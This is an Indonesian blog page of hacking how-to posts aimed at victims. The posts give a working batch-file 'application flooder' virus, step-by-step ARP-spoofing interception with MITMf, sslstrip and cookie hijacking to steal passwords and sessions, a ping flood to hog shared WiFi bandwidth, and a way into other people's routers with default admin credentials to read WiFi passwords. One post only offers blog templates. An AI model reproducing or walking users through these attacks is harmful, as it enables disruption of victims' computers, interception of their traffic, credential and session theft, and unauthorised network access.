Minggu, 03 Maret 2019

Cara Membuat Virus Application Flooder Dengan File Batch

0 komentar
Tidak seperti bom fork yang sudah saya jelaskan pada artikel sebelumnya, "Application flooder" merupakan salah satu jenis serangan pada sistem komputer yang besifat jahil dan sama sekali tidak meninggalkan kerusakan pada perangkat komputer secara permanen, meski secara teknis tidak berbahaya, serangan ini adalah termasuk salah satu serangan virus yang sangat menyebalkan, karena jika file batch ini dijalankan oleh korban maka munculan jendela popup akan terus bermunculan dan tidak bisa di close.



Kode Untuk Membuat Application Flooder



@echo off
:begin
start mspaint
start notepad
start write
start cmd
start explorer
start calc
goto begin


Penjelasan Struktur Kode Application Flooder
  • @echo off - Perintah ini hanya menghentikan suatu perintah agar muncul saat file batch dijalankan. Saat kalian memulai file batch, proses command prompt (cmd.exe) dibuka dan instruksi file batch akan disalurkan melalui kode pada application flooder. Kami menggunakan @echo saat kami tidak ingin memberi tahu pengguna tentang apa yang dilakukan file batch yang sedang berjalan.
  • : Begin - Perintah ini merupakan sebuah label, hal ini bisa dikatakan seperti penanda atau pos pemeriksaan, posisi dalam program yang telah kalian beri nama.
  • Start - Perintah ini digunakan untuk menjalankan sebuah file executable, mirip dengan apa yang terjadi saat kalian mengklik dua kali sebuah aplikasi. 
    Kalian dapat melihat bahwa kalian memiliki banyak perintah dan semuanya dimulai dengan sesuatu yang berbeda. Contoh yang saya berikan ini hanyalah beberapa program default yang disertakan dengan semua instalasi windows, dan pada saat inilah kalian dapat membanjiri sebuah aplikasi atau sistem komputer dengan pop-up yang sangat menyebalkan. 
  • Goto - Kalian harus dengan label yang baru kita definisikan di atas? (: Begin) Dengan menggunakan perintah goto, kalian telah memasukan suatu perintah ke label 'begin', dan program akan melanjutkan eksekusi lain secara otomatis. Jenis serangan ini meruapakn jenis derangan loop tak terbatas. 
Penjelasan ini adalah salah satu virus paling sederhana dan tertua yang masih ada sampai saat ini. tetapi ceritanya belum berakhir sampai disini, dalam kesempatan artikel selanjutnya kalian akan benar-benar mengenal suatu Virus yang diklaim sangat bisa menginfeksi dan membahayakan sistem komputer, tentunya juga dengan cara dan pengerjaan yang lebih rumit. Namun, setidaknya kalian sudah selangkah lebih dekat ke pemahaman yang lebih baik tentang gambaran besarnya.


Sumber : komputerdia.com
Continue reading →
Minggu, 17 Februari 2019

Cara Menyadap Dengan Main In The Middle Attack (MITM)

0 komentar
artikel ini dikutip dari www.komputerdia.com

MITM (kepanjangannya ada di judul) adalah teknik hacking meletakkan dirinya ada di tengah-tengah dua perangkat yang sama-sama berkomunikasi. Karna hacker ada di tengah-tengah komunikasi, ini bisa dipastikan bahwa pelaku dapat melakukan sebuah pembacaan, memodifikasi atau juga mereka bisa melakukan modifikasi / pencekalan terhadap paket yang nantinya akan dikirim atau diterima kedua perangkat tersebut.


Hasil dari tehnik h*cking man in the middle ini yaitu penyadapan informasi serta pencurian password (kata sandi).


Sebelum kalian menuju trik dibawah, kalian harus belajar dulu mengenai apa itu ARP, Mac Address, IP, dll nya


Daripada gua jelasin panjang lebar, mending kita langsung ke trik-triknya dibawah berikut ini:





MITM bekerja dengan mengeksploitasi ARP (addresss resolution protocol). ARP ini adalah protokol yang bertugas untuk menerjemahkan peng-alamatan dari IP Address menjadi suatu MAC Address. 

Pada intinya komunikasi jaringan pada tingkat bawah memakai Mac Address sebagai identitas antar piranti, hingga jika table ARP nya di modifikasi oleh seorang h*cke, maka pengiriman data kemungkinan besar akan sangat bisa dimanipulasi dengan maksud agar kiriman tersebut bisa  salah arah.

Pada Windows, kalian bisa mengecek table ARP dengan mengetikkan perintah arp -a di command prompt (cmd). Didalamnya ada catatan baris alamat IP serta Mac Address dari semua computer yang tersambung dengan jaringan yang kalian miliki. Sebagai contoh, silahkan kaliat cermati gambar dibawah ini yang menggambarkan perbedaan rute pengiriman data sebelum dan sesudah dilakukannya serangan MITM (Main In The Middle) .



Gambar diatas adalah ilustrasi sebelum MITM bekerja, tapi jika MITM sudah diluncurkan maka gambar akan tampak seperti dibawah ini


Hal ini disebabkan oleh ARP, karena pada dasarnya ARP sendiri mempunyai dua kekurangan yang bisa dimanfaatkan oleh seorang H*cker, yakni : 


  • Setiap ARP Request atau ARP Respon senantiasa Trusted (diakui) ; 
  • Client bisa terima respon bahkan juga bila mereka tidak kirim sebuah request. 
Tiap-tiap device ketika baru tersambung ke satu jaringan akan selalu  ajukan pertanyaan “siapa routernya? ” kemudian sebuah router juga akan merespon “Saya adalah routernya”. Bersamaan dengan itu maka tercatatlah info IP Address serta Mac Address di ARP Table. 


AYOK KITA MEMULAI PENYERANGAN 


HARUS DIINGAT OS yang digunakan wajib os berbasis linux(ubuntu, dll), namun jika kalian menggunakan operating sytem windows, sebagai opsinya kalian bisa menggunakan linux via Virtual Box.

  • Pastikan kalian menggunakan Operating system Linux
  • Download Tools Man In The Middle Framework (MITMf)
  • Setelah kalian mendapatkan tools tersebut, pastikan kalian telah masuk dalam jaringan korban, untuk masuk kejaringan si korban kalian bisa menggunakan perintah dibawah ini

  • mitmf –arp –spoof -gateway [ip router] -targets [ip target]

    Contoh : mitmf –arp –spoof -gateway 192.168.1.1 -targets 192.168.1.1











  • Langkah selanjutnya, silahkan kalian aktifkan IP Forward dengan cara mengedit file seperti dibawah ini


  • /proc/sys/net/ipv4/ip_forward
  •  untuk awal 0 (tidak aktif) silahkan kalian ubah menjadi 1 (aktif). hal ini dilakukan agar paket yang tidak ditujukan untuk perangkat kalian dapat diteruskan ke perangkat target (korban).
  • Saat tools MITMF ini digerakkan, maka dengan automatis akan melaksanakan serangan seperti yang diterangkan di atas (menipu client serta menipu router) sekaligus menggerakkan paket snifing dengan kata lain penyadapan. paket yang disadap juga akan tertulis langsung di terminal. 
  • Info sensitif seperti username serta password juga akan terlihat jadi text bulat (tanpa ada enkripsi) bila website yang dibuka tidak memakai ssl (https). 
  • Contoh, Pada browser google chrome, korban mengakses halaman login seuatu situsserta mengisikan username dan password, karna website itu tidak memakai https jadi username serta password di kirim tanpa ada enkripsi, paket yang memiliki kandungan username serta password tadi juga akan melalui piranti h*cker terlebih dulu hingga akan terbaca oleh piranti hacker tersebut. 
  • Umumnya website situs besar memakai ssl (website https) supaya lebih aman, fungsinya sudah pasti untuk mengenkripsi semuanya data supaya tidak dapat disadap. Hebatnya MITMF menggerakkan program sslstrip dengan automatis. SSLstrip yaitu program yang bisa dipakai untuk mendowngrade https jadi http. Walau demikian website situs besar seperti facebook memakai keamanan lain yang memaksa supaya tetap memakai https, namun terkadang situs besar tersebut juga bisa kita kelabui dengan cara ini .
  • Tetapi apa yang terjadi bila target memakai feature remember me?. Memakai feature “remember me” akan membuat kita login automatis memakai cookie. Dalam keadaan ini password serta username tidak di kirim ke server hingga H*cker juga tidak bisa lihat passwordnya. 
  • Login memakai cookie nyatanya tetaplah berbahaya karna cookie itu bisa dicuri. Maka dengan demikian h*cker tersebut juga dapat mengambil cookie nya lantas menggunakan cookie tersebut di browser mereka. Langkah tersebut buat Hacker bisa login tanpa harus mengetahui username serta password target. bukankan hal ini menjadi lebih simpel dan praktis. 
  • Untuk mengambil cookie pada browser korban, seorang hacker juga membutuhkan tiga program yang dijalankan sekaligus yakni : 
    1. Mitmf untuk man in the middle, 
    2. Farred untuk mengambil cookie 
    3. Hamster untuk inject cookies ke browser kali linux
  • Namun perlu kalian ketahui bahwa Cara H*cker untuk melakukan teknik ini tentu berlainan dengan cara yang saya beritahukan,  karna terdapat beberapa tool dengan peranan yang sama, jadi bisa disimpulkan bahwa masih banyak cara yang bisa kalian lakukan diluar artikel yang saya bagikan ini.
  • Untuk cara lebih mendalamnya, silahkan kalian mencari informasi diluar artikel saya ini, karena untuk melanjutkan ke hal yang lebih dalam tentunya saya sudah melanggar kode etik sebagai publisher
  • Saya bisa meyakinkan jika tahap finishing bisa kalian lakukan dengan kemampuan yang kalian miliki
Continue reading →
Minggu, 07 September 2014

Cara Menyedot Bandwith WiFi dengan Ping

0 komentar
Nah, selain menggunakan aplikasi yang bernama NetCut (artikel disini), kalian juga bisa ko sedot bandwith WiFi dengan menggunakan Command Prompt saja....Jadi, semua jatah Bandwith milik teman" Anda dapat diberikan semuanya secara stealth (hihihi). Penasaran, kepo (wkwkwkw canda) :

  • Buka Start > Run > CMD
  • Pada jendela Command Prompt lihat dulu DNS yang anda pakai. Ketik ipconfig/all > Enter
  •  
  • Nah lihat nih, DNS yg saya gunakan adalah yg ditunjuk panah
  • Geser ke bagian paling bawah dan ketikkan perintah ' Ping -L 500 (dns kamu) -t. Sebagai contoh  Ping -L 500 192.168.1.1 -t kemudian Enter
  • Biarkan proses ini jangan di close jendelanya :)


Continue reading →
Selasa, 26 Agustus 2014

Download Template keren

0 komentar
1. Dead Template
Download Template keren

2. Assassin's Creed Template

Download Template keren
Continue reading →
Jumat, 15 Agustus 2014

Membobol Password WiFi dengan Router Modem

0 komentar
Mungkin dari kita hampir semua pernah mengalami jika sedang berjalan-jalan di sebuah mall, sekolah, perkantoran akan menggunakan akses Wifi milik orang lain bukan ? Tapi Wifi tersebut dipassword -.-, sehingga kita pun tidak dapat mengakses wifi tersebut. Nah, Bagi kalian yang tidak tahu password wifi milik seseorang kalian dapat membobolnya dengan mudah melalui router modem tersebut.

Tapi perlu anda ketahui bahwa trik ini dapat anda praktikkan jika Modem masih menggunakan password default dan belum diubah oleh pemiliknya. Berikut tutorialnya :

  •  Buka browser kesayangan Anda dan ketikkan IP Address modem kemudian tekan enter
  •  Dalam keadaan default, IP address modem biasanya menggunakan 192.168.1.1
  • Jika muncul kotak dialog password seperti gambar 251, maka silahkan masukkan Default Password ( Username : admin , pass : admin)
  • JIka berhasil, Maka anda akan dibawa pada Halaman Setting moden tsb
  • Klik Menu Interface setup
  • Klik Wireless
  • Geser ke bagian kotak Pre-Shared Key dan lihatlah passwordnya :)
  • Anda juga dapat menganti password sesuka hati :)
Moga bermanfaat
Continue reading →